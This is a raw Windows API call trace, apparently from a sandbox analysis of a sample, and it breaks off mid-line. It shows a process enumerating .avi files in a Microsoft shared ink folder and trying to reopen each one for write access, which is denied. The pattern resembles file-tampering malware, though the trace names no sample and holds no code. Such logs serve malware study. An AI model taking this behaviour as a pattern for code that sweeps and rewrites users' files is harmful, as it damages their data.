RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0098.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0098.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0098.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0098.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0098.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0098.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0098.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0098.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0098.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0098.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0098.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0098.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d0d0 [0098.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0098.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0098.727] AreFileApisANSI () returned 1 [0098.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi", lpUsedDefaultChar=0x0) returned 75 [0098.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0098.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0098.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0098.727] AreFileApisANSI () returned 1 [0098.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0098.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x856c0 [0098.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x856c0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 75 [0098.727] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.728] GetFileType (hFile=0x27c) returned 0x1 [0098.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x856c0 | out: hHeap=0x20000) returned 1 [0098.728] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.728] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.728] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.728] CloseHandle (hObject=0x27c) returned 1 [0098.728] AreFileApisANSI () returned 1 [0098.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0098.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x853a0 [0098.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x853a0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 75 [0098.729] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.729] GetLastError () returned 0x5 [0098.729] GetLastError () returned 0x5 [0098.729] SetLastError (dwErrCode=0x5) [0098.729] GetLastError () returned 0x5 [0098.729] SetLastError (dwErrCode=0x5) [0098.729] GetLastError () returned 0x5 [0098.729] SetLastError (dwErrCode=0x5) [0098.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x853a0 | out: hHeap=0x20000) returned 1 [0098.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0098.729] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.729] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.729] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1a612b1, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1a612b1, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xbf28, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="boxed-delete.avi", cAlternateFileName="")) returned 1 [0098.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0098.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0098.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0098.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0098.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0098.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0098.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0098.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0098.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0098.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0098.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0098.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0098.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0098.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0098.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0098.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0098.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c848 [0098.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c848 | out: hHeap=0x20000) returned 1 [0098.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0098.730] AreFileApisANSI () returned 1 [0098.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi", lpUsedDefaultChar=0x0) returned 74 [0098.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0098.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0098.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0098.730] AreFileApisANSI () returned 1 [0098.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0098.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85bc0 [0098.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x85bc0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 74 [0098.730] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.731] GetFileType (hFile=0x27c) returned 0x1 [0098.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85bc0 | out: hHeap=0x20000) returned 1 [0098.731] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.731] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.731] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.731] CloseHandle (hObject=0x27c) returned 1 [0098.731] AreFileApisANSI () returned 1 [0098.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0098.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x858a0 [0098.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x858a0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 74 [0098.731] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.732] GetLastError () returned 0x5 [0098.732] GetLastError () returned 0x5 [0098.732] SetLastError (dwErrCode=0x5) [0098.732] GetLastError () returned 0x5 [0098.732] SetLastError (dwErrCode=0x5) [0098.732] GetLastError () returned 0x5 [0098.732] SetLastError (dwErrCode=0x5) [0098.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x858a0 | out: hHeap=0x20000) returned 1 [0098.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0098.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0098.732] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.732] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.732] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a1d507, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1aad768, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1aad768, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xb61e, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="boxed-join.avi", cAlternateFileName="")) returned 1 [0098.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0098.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0098.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0098.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0098.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0098.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0098.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0098.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0098.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0098.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0098.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0098.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.733] AreFileApisANSI () returned 1 [0098.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi", lpUsedDefaultChar=0x0) returned 72 [0098.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0098.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0098.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0098.733] AreFileApisANSI () returned 1 [0098.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0098.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b110 [0098.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x8b110, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 72 [0098.733] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.734] GetFileType (hFile=0x27c) returned 0x1 [0098.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0098.734] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.734] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.734] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.734] CloseHandle (hObject=0x27c) returned 1 [0098.734] AreFileApisANSI () returned 1 [0098.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0098.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0098.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 72 [0098.735] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.735] GetLastError () returned 0x5 [0098.735] GetLastError () returned 0x5 [0098.735] SetLastError (dwErrCode=0x5) [0098.735] GetLastError () returned 0x5 [0098.735] SetLastError (dwErrCode=0x5) [0098.735] GetLastError () returned 0x5 [0098.735] SetLastError (dwErrCode=0x5) [0098.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0098.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0098.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0098.735] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.735] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.735] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1a8750a, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1a8750a, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x148de, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="boxed-split.avi", cAlternateFileName="")) returned 1 [0098.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0098.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 